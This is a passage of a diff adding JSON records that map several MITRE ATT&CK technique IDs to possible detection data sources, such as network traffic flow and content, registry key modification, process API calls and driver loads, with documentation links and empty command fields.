[ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1588.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1547.012", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ] + ] + }, + { + "technique_id": "T1598.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1598.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1598.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., 